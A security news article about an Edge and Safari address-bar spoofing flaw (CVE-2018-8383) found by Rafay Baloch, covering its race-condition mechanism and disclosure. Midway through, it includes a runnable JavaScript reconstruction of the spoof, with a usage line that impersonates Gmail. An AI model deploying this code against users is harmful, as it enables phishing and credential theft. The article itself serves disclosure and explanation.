Rafay Baloch has reported a vulnerability in the Edge and Safari browsers that allows address bar spoofing.
Phishing attacks have become increasingly sophisticated and difficult to detect, so it is welcome that security researchers are managing to spot such techniques early. Pakistani security researcher Rafay Baloch has reportedly discovered a flaw in the Safari and Edge browsers that defeats the basic indicators a user checks first to decide whether a website is genuine: the HTTPS/SSL status and the URL shown in the address bar.
According to Baloch's findings, the flaw lets an attacker control what is displayed in the address bar, which makes for phishing attacks that are very hard to detect. The bug is a race condition: the address bar is updated with the requested address before the page has actually loaded, and in that window JavaScript can change the content shown beneath the genuine address. The Edge instance of the vulnerability has been assigned the tracking ID CVE-2018-8383; no severity score had been published at the time of writing.
Baloch reproduced the bug in both Edge and Safari and notified Microsoft and Apple. Microsoft responded and shipped a fix for Edge in its 14 August security updates; Apple has not yet released a patch. The findings have now been made public because the three-month grace period customarily given to vendors to fix a flaw expired about a week ago.
If exploited successfully, the vulnerability lets an attacker start loading a genuine web page and, once its address is displayed in the address bar, quickly swap in malicious content beneath that address. Exploitation still requires the attacker to lure the victim to a specially crafted website, for example via a phishing link; with no Apple patch available, Safari users remain exposed to the attack.
“Upon requesting data from a non-existent port the address was preserved, and hence a race condition over a resource requested from a non-existent port, combined with the delay induced by the setInterval function, managed to trigger address bar spoofing,” Baloch explains on his blog. “It causes the browser to preserve the address bar and to load the content from the spoofed page. The browser will eventually load the resource; however, the delay induced with the setInterval function would be enough to trigger the address bar spoofing.”
The bug was also demonstrated with proof-of-concept (PoC) code: a page hosted on sh3ifu.com displayed Gmail's address in the address bar while serving its own content, and the spoof worked. Some page elements took longer to load, a hint that the loading process had not completed.
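The following is an added example that reconstructs the mechanism Baloch describes (a window opened on a port that never answers, so the address bar keeps the genuine host, and the opener writing its own content into that window after a setInterval delay). It is not Baloch's PoC or code from his blog; the target origin, the dead port number and the delay are assumptions chosen for illustration, and the `buildSpoofTarget`/`runSpoof` names are this example's own. Patched Edge and current Safari builds will not display the spoofed address.

```javascript
// Added example reconstructing the described address-bar spoof mechanism.
// Not the researcher's original PoC; origin, port and delay are assumptions.

// Build the "non-existent port" URL for the target origin. The WHATWG URL
// parser keeps scheme and host exactly as the address bar would show them.
// The scheme's default port is refused: URL normalises "https://host:443"
// back to "https://host", which would load the real site instead of hanging
// on a port nothing listens on, and the race would never open.
function buildSpoofTarget(origin, deadPort) {
  const u = new URL(origin);
  if (u.pathname !== '/' || u.search || u.hash) {
    throw new Error('origin must be a bare scheme://host[:port]');
  }
  u.port = String(deadPort);
  if (u.port === '') {
    throw new Error(`port ${deadPort} is the default for ${u.protocol}; it would reach the real site`);
  }
  return u.href;
}

// Browser-side part of the spoof. Opens the target so the address bar shows
// the genuine host, then, while the request to the dead port is still pending
// and the popup still holds the opener-accessible initial document, repeatedly
// writes attacker content into it. Returns the interval handle. Only meaningful
// in a browser; under Node it refuses to run.
function runSpoof(target, html, delayMs = 1000) {
  if (typeof window === 'undefined') {
    throw new Error('runSpoof needs a browser window');
  }
  const win = window.open(target);
  const handle = setInterval(() => {
    try {
      win.document.open();
      win.document.write(html);
      win.document.close();
    } catch (e) {
      // Once the browser commits the real navigation, or blocks cross-origin
      // access to the popup, the write fails and the spoof is over.
      clearInterval(handle);
    }
  }, delayMs);
  return handle;
}

// Usage in a page the victim is lured to (assumed values):
//   runSpoof(buildSpoofTarget('https://www.gmail.com', 8080),
//            '<h1>Spoofed page</h1>', 1000);
```

The defensive lesson for browser implementers is in `buildSpoofTarget`'s port check: the spoof depends entirely on the address bar committing the new URL before the navigation has produced a response. A browser that only updates the address bar once the response has committed gives the opener nothing to race against, which is what the Edge fix amounts to.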
Safari does not let the user type into form fields while a page is still loading, which would have blocked credential entry on the spoofed page; Baloch explains that his team overcame this by overlaying a fake keyboard on the screen. Because the URL in the address bar never changes, the phishing page becomes even harder to detect. The flaw can allow an attacker to impersonate any website, such as Facebook, Twitter, Gmail or a bank, and present a fake login screen to steal credentials such as usernames and passwords.
This is not the first time Baloch has identified such critical flaws. He previously reported critical vulnerabilities in the Firefox and Chrome browsers to their vendors, and also reported vulnerabilities in Gmail that allowed anyone to hack Gmail-based email addresses. Last but not least, Baloch earned $10,000 in 2016 for reporting vulnerabilities in PayPal.